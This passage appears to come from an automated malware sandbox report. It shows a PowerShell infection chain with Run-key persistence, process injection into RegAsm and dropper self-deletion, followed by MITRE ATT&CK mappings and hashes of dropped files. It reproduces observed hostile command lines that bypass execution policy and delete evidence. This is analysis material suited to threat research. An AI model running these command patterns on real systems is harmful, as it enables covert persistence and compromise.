              cmd.exe /c "powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\aykmz.ps1'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4440
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\aykmz.ps1'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2260
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\aykmz.ps1"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4836
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3344
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5100
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2244
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kebrb.ps1"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2776
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1496
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3132
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3476
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4832
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4748
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1032
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2140
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4364
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3976
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4192
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4424
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4188
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4324
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3024
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3528
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3944
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:116
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1040
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3320
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1"
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4528
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:64
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 624
                  6⤵
                  • Program crash
                  PID:948
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs"
              4⤵
                PID:3468
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 64 -ip 64
          1⤵
            PID:2452

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Defense Evasion

          Indicator Removal

          1
          T1070

          File Deletion

          1
          T1070.004

          Modify Registry

          1
          T1112

          Obfuscated Files or Information

          1
          T1027

          Command Obfuscation

          1
          T1027.010

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          Remote System Discovery

          1
          T1018

          System Information Discovery

          2
          T1082

          System Location Discovery

          1
          T1614

          System Language Discovery

          1
          T1614.001

          System Network Configuration Discovery

          1
          T1016

          Internet Connection Discovery

          1
          T1016.001

          Lateral Movement

          Collection

          Command and Control

          Web Service

          1
          T1102

          Exfiltration

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\aykmz.ps1
            Filesize

            426B

            MD5

            159e88afa07fa803b7a3b9f522395c05

            SHA1

            eb815ff2ca14fbf4a4fde8ecdec8df55fce77da0

            SHA256

            457881878c8ffa39f6c0c60331edae4681751479ab9c93d6ae1ac3866157c826

            SHA512

            d4e6acd24bba9b301ff0be7e68cfa19bd15246980aef1f73860a428325a1a1f4c35f906efba3acfb73816c81398d40ad4b21f0f889d9de38e1a3596857f2dd97

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kabva.ps1
            Filesize

            431B

            MD5

            96d691f90cc583994156bb57410c99df

            SHA1

            3286d065a83bd082e39710f38ca1cf1db7fcd222

            SHA256

            7958062ea36c0658f9e830f6ac168a917cd9a63fbbdaffc79534882cd099505c

            SHA512

            76294f91dd0c66c4befbd0cb264ec62de4adc8380d2befc2f06cacbc2a15c31eb998e4387192dd5424c0e0cf2c7b4b77db99a30afb5d232d229e91382511ae99

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\kebrb.ps1
            Filesize

            1.2MB

            MD5

            e0a341d5abd5145c9a5fb6e42a9c2f65

            SHA1

            c64be0d882292d933b7fef06d9b5819155389a3e

            SHA256

            9461aefd2cf17676088a11ef0ea7d97e52cac0ca8127ff00c0bd96a82b868ff7

            SHA512

            ad26b058529cf559dfb1991bd0f2a12052c970c858b2ff969a50f343170b9d8a1609bab16d2d6824d01e53992a698c8013281b709b8f0c306461a6e049008224

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            223bd4ae02766ddc32e6145fd1a29301

            SHA1

            900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

            SHA256

            1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

            SHA512

            648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            476B

            MD5

            a734b2df4344937f88616097b7739b2c

            SHA1

            cb0552baa3c0c112b2d77722ec8a3a870bcf334a

            SHA256

            edaf575bd64bd68f1fec2a4594a6bc1945d4eca17a3e368f14773fddd91a757c

            SHA512

            f4cf5c365fe35046001eec56e53a42f69e8541ce568eb66ad597d99d6b14758bce9e2dc16c077434d497f5374966a4b7c3d009c3b2915299d9de72231b60a7a1

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            82318e15e5ce7c493141231888d93dda

            SHA1

            23f405c2b1070e83afe7cd3fcd003778ff037f69

            SHA256

            8b371583aae723e1b722ea2f6c1a8f9d2086b58f62ab9a9f1fc050c0a86a1b38

            SHA512

            220a7cd5ec309e91f6086023b89d2e52c32b4938e6e1c11674f1f3b8b762ab6586fb9819fba85db6a989080e45c5e2e1dbeeb6c0cc51a29db7032f72f3547d45

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            104B

            MD5

            3643f3417f53c598e855fa1f586235f6

            SHA1

            9bfb35a65723efee29612cf52bb6ae30f8a7d45f

            SHA256

            d1ea31e84e708086e4404368f7ea90b52ef05f25fc1221182dbab2353f57e3ed

            SHA512

            c89ce285d3930de610df530c6495ed7dedc05c8ea2cc1f9c4ba94d43732c622b9f5581aefab83f441f8acdc36c4755bdff939c250aecd91c5c0ad32814b12d0f

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            948B

            MD5

            c1a54dd5a1ab44cc4c4afd42f291c863

            SHA1

            b77043ab3582680fc96192e9d333a6be0ae0f69d

            SHA256

            c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

            SHA512

            010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            d8b9a260789a22d72263ef3bb119108c

            SHA1

            376a9bd48726f422679f2cd65003442c0b6f6dd5

            SHA256

            d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

            SHA512

            550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            6e98e6607b93e97d426bc94a3e13511d

            SHA1

            954e752f4acf266f92038e4570dc41a996c1116e

            SHA256

            4637378c1d77a27a6e5049ad4148a7634133076d453bdd6d0b4a20dbd8e2402d

            SHA512

            5b2a9570adbb95ac046d4f0c0e9e2571923f585a37e4b2f55eba6b1bb6b0f5b0e601d7181726997a90e02aad2f794ca81d84346f5ad9908a5e9f686f4fa4176f

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            87e53cb9a3e3cf19b666c8805c8372f9

            SHA1

            a55d30566ec45435fc041d2846cc82d7d40f3d61

            SHA256

            58f557dec41a3c088a7f386ae56ba6684e21f47cb61080b24a955374d5948671

            SHA512

            11036d3a4503fd799898cd65227546f549195692694446aab3dadbf48fb280d683b28e7063a49506a885220c46428cf969d9386d93cb7c3ce5b59fd2b91b0c74

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            d49246229b2077d7961ee5c90e0945f8

            SHA1

            8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

            SHA256

            581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

            SHA512

            5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            331841fe482ffe8b1cc1509733d8ca67

            SHA1

            1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8

            SHA256

            14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f

            SHA512

            039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            69c1bcdd63d103cacaed642462f53fa3

            SHA1

            29f27c94e59740883c723c04d9d95b7f61975f32

            SHA256

            bcc17b231515d20c96a9da6eb14b4d097d00b6fded0aa062b2ad29c1eab77442

            SHA512

            59fbd3df8055117b6be28808804b5fc54504ab67d848b3009b49e49c0666e1a4161aa021f71790524a37f111df8f2ae3bf9b20e4177daab3d3365a7f2f9df92e

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            a68fcc3482ebb381cd7eb80d4dfc7ac9

            SHA1

            68f694b1b7999996678244d8ef9d95f520ec2e39

            SHA256

            1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

            SHA512

            a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            fb63dc5cb6b9e317133f4e9a61b6de0e

            SHA1

            a818b98411bdcd7baaafd4928400377f85016d1f

            SHA256

            d6a736473f6ba35cc8212d7b8d181079e574cd8e2c4cb30e5968481684a12771

            SHA512

            df8afd94f55ea1c634f45e4ea2c0b26dfa93c28a2c8eaa0e498fd93d94cd1e549f8a85b65572c2383f41394c60b30a7535802375879752a2d929ad3a2f77c67b

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            bcafc135b5908463abc7ef41c4081ca5

            SHA1

            7d0c3422e1bd54dffffc26d6d84f29110876ea0d

            SHA256

            77db5835da2b9b2d7082f530114c8ac733bf81cdba42dcd8035b4e7d198289b6

            SHA512

            eefdad6b3242b4ef7c7af17bddd3a2eaa3ea49fe92a1b40154bddae8e9b105f6b3ad4ddb13995e229f4667ec357408d9b3fce22705657c1b9354f4c257593e5f

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            012245604d1f9b30879904558e292da8

            SHA1

            e48ed6db7b52f6de8287fc5d7f6ea100326adfdc

            SHA256

            0f7c853bc431a078e6c661be3ac34d9bd0d2ac533f49eda183887122dfc02f0c

            SHA512

            78506118229cbcd2195b029912e769d1e2715471a24431a772c7a663493c9dccef8738bae29ca8ac0d227a2ace3f902fd9ec018fa5be3faa137efe19c1c51d10

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            471ce76847e13cf97cf882a5c41a8363

            SHA1

            79b11c6bbe9c8af88b4027267e02885061a364af

            SHA256

            5599f4a86f6ef1e750cf748809de82241ab9f65e1762f402c6b65b6de3bd1b2e

            SHA512

            c13334b4c6bd8ee0eb910f4f1473f99b882c5f658a33d8be2c7bf7fed7201553fcf56029d5871310a477ab147eb6428fef963fce5bc0722165db40cfb630aa8b

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            1536159346e9a2061e905bb38ac9fd35

            SHA1

            eff17db4721dc0add117ed399b839130d27675d4

            SHA256

            6b0eebfc544130c7a8f7d0e45c8e0b86748c13b528bc9948f216a76d8be2b88f

            SHA512

            fab6f66ac2bc68e2a82199da2519c7aae2d629603450175b69336097111e57f49fbea8b3903f7a106150032d8e5c653a90f681a10d7be668bff2bcdb798eb4ee

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            9a3bf6ee564a617a7da759ea1fa6f4e6

            SHA1

            4a8fd9c12a5baf5b3a778dfc68ddf0cdc056f65b

            SHA256

            4fe49644bc0792457d1bf7adb7c7e7f816c84b1ff09ac78525e9a669b8b0a71a

            SHA512

            75d8d22cf53dfe7fe35e3d579bac7f1d41285668034d246753884d573a6752a2d09157dccf73de9f33ec10310cf7d74a8f595776093acdfbf9089adcae1eb49b

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            5420501faa0dc204ae12f25fbc91d3b0

            SHA1

            399110a4b1b2f4b66bc4178ce1a458f078bdd40d

            SHA256

            a005eb540bdbbd8c2d5aa569e132bfbb75c3b489700b2f19764d351433e587e9

            SHA512

            157fc9d373cb6cf862b5658e3adb02b512bc26eb82639503c76c21d770915b2af543d9aca491dc7420ce6247834b71693dc80ce7dedab177a624a6d7ba712b61

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            07ac9f95d8b16a198963d5b669eca2f8

            SHA1

            a45b28c4aced1de0eacaa54a38208bbe82f05d34

            SHA256

            9ba8a7edec1a92e26aa48ee62e00e49cfc4847cfcbe304a4099dc0dd0f3e5b05

            SHA512

            290b472719f9a1d2121c1a100ab811c15ca43bddb0d274c3da802e28baa13a513d8e3b8bf24a56a54aa057fc892de465c6e06a3020384aec51e09726012a1231

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_upqqxztn.1kt.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\dll01.txt
            Filesize

            26B

            MD5

            a71106f77e76863cf51cd106ca621588

            SHA1

            edb2a1e36357710015c8c2ad3ce4a95437b4f846

            SHA256

            b4d1cadb3a01b5d41ecaa5bcb0f399318bad8b816817b63b4a69fd25edae3b16

            SHA512

            f0ee4f9ca92d7e9c88a5d6eb500e59d6240ffb8ec07fff4e3201b6a2dcf3f7c6cc8753ae4160167a94ece01166b781b60db57caca5c88da3478935041c084a79

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\dll01.txt
            Filesize

            51KB

            MD5

            2fd928c25e6057514d5565e71e89e9f2

            SHA1

            027be4cb31adde399d66cf1342addae22fa9b8b8

            SHA256

            8db035bff4fa0232c9c428fe86806e95a64c2ec0e184be90890fcfcacca27682

            SHA512

            1620fe938cb8dcb981befb1a1ebcdbbf67bc1c0cd26b2827061c62df32aea7972854ca67a63d028f559e577854ab36d40bc12891570520a88b8c97eeb04f7cf6

            Download Submit

          • C:\Users\Admin\AppData\Roaming\pesister.ps1
            Filesize

            231B

            MD5

            f2bf6f0242a4783b104235cbdee921bd

            SHA1

